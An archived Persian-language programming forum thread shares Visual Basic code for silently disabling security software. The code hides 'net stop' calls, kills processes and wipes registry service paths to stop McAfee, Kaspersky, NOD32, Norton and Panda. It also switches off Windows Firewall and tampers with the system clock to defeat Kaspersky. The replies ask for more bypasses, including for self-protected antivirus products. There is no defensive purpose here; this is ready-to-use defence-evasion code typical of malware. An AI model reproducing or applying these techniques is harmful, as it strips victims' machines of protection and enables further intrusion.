PDA

View Full Version : طریقه ی غیر فعال کردن آنتی ویروسهای مختلف با VBasic



REZADG
جمعه 16 اسفند 1387, 18:06 عصر
MCafee
نقل قول:
Shell "net stop " & """" & "mcshield" & """", vbHide

براي فعال کردنش هم ميتونيد از اين دستور استفاده کنيد.

نقل قول:
Shell "net start " & """" & "mcshield" & """", vbHide
براي غير فعال کردن مک آفي از اين روش هم ميتونيد استفاده کنيد.

نقل قول:
Shell "net stop " & """" & "McAfee VirusScan Enterprise" & """", vbHide
براي غيرفعال کردن Kasoersky هم از اين کد استفاده کنيد.


Shell "net stop " & """" & "Kaspersky Internet Security" & """", vbHide

Kasper Sky 7 ممکن است با روش بالا غير فعال نشه چون يه فايل پشتيبان داره که نه اجازه ميده خود برناه رو ببندي نه تو رجيستري مربوط به اون تغيير ايجاد کني.


اما با اين روش مي تونيد Kaspersky هم غير فعال کنيد.

اين کد زمان کامپيوتر رو به دست کاري مي کنه و يه کاري مي کنه که Kaspersky غير فعال بشه.

نقل قول:
Dim Time As SYSTEMTIME
Time.wYear = 1984
Time.wMonth = 2
Time.wDayOfWeek = 2
Time.wDay = 27
Time.wHour = 9
Time.wMinute = 30
Time.wSecond = 0
Time.wMilliseconds = 0
SetSystemTime Time
اين هم براي غير فعال کردن نود 32 :

نقل قول:
Shell "net stop " & """" & "NOD32 Antivirus" & """", vbHide
اينم براي نوترون :

نقل قول:
Shell "net stop " & """" & "Norton Antivirus Auto Protect Service" & """", vbHide
اينم براي پاندا :

نقل قول:
Shell "net stop " & """" & "Panda Internet Security " & """", vbHide
يا :

نقل قول:
Shell "net stop " & """" & "Panda Antivirus" & """", vbHide
windows firewall

نقل قول:
objFireWall As Object
Set objFireWall = CreateObject("HNetCfg.FwMgr")
Set objpolicy = objFireWall.localpolicy.currentprofile
objpolicy.firewallenabled = False
اینم برای غیر فعال کردن رایج ترین آنتی ویروسها

نقل قول:
On Error Resume Next
'Nod32
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\NOD32krn ", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\NOD32krn ", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run ", "egui", ""
Shell "taskkill /f /mi NOD32krn.exe", vbHide
Shell "Taskkill /f /mi NOD32KUI.EXE", vbHide
'Nod32 ( Versione Ghadimi)
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\ekrn", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\ekrn", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\ekrn", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run ", "egui", ""
Shell "taskkill /f /im egui.EXE", vbHide
Shell "taskkill /f /im ekrn.EXE", vbHide

'Kaspersky
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\AVP", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\AVP", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\AVP", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "Software\Microsaft\Windows\CurrentVersion\Run ", "AVP", ""
Shell "taskkill /f /mi aVP.exe", vbHide
Shell "taskkill /f /mi avp.exe", vbHide

ali190
چهارشنبه 03 آذر 1389, 21:54 عصر
باسلام
ما در شرکتمون از آنتی ویروس McAfee نسخه تحت شبکه اش استفاده میکنیم
زمانیکه که McAfee رو غیرفعال میکنیم دوباره بعد از گذشتن 3یا 4 دقیقه دوباره فعال میشه و سیستم رو کند میکنه
این حالت رو چطور میتونیم از کار بندازیم و کلاً غیرفعالش کنیم
ممنون میشم کمکم کنید
یاعلی

AmirAmiri
پنج شنبه 04 آذر 1389, 21:53 عصر
سلام.
احسنت احسنت خیلی عالیه. :تشویق: :تشویق: واقعا جایه تقدیر و تشکر داره.
کاش روش غیر فعال کردن تمامه آنتی ویروس ها رو قرار میدادی، این آنتی هایی که قرار دادید تنها آنتی ویروس های رایج در کشور ماست در حالیکه در کشورهای دیگه از آنتی ویروس های خیلی بهتر و قوی تری مثله بیت دیفندر استفاده میکنن.
کاش در مورد این آنتی ویروس ها هم تحقیق میکردید و روش غیر فعال کردنشون رو قرار میدادید.
BitDefender
ZoonAllarm
Avira
AVG
G Data
Avast
و امثاله اینا چون این آنتی ویروس ها هم در ایران رایج هستن و استفاده میشن.
روش غیر فعال کردن آنتی ویروس هایی مثله Kaspersky نسخه های جدید که توسط یه فایل پشتیبانی میشن و اجازه تغییر کلیدهای مربوط به خودشون در رجیستری رو هم نمیدن، رو حتما در بیار چون خیلی از آنتی ویروس های جدید به این روش متوصل شدن و نمیشه اونها رو غیر فعال کرد پس اگه این روش رو بتونی دور بزنی یعنی از سد تمامه آنتی ویروس ها گذشتی و واقعا معرکه میشه.
:تشویق: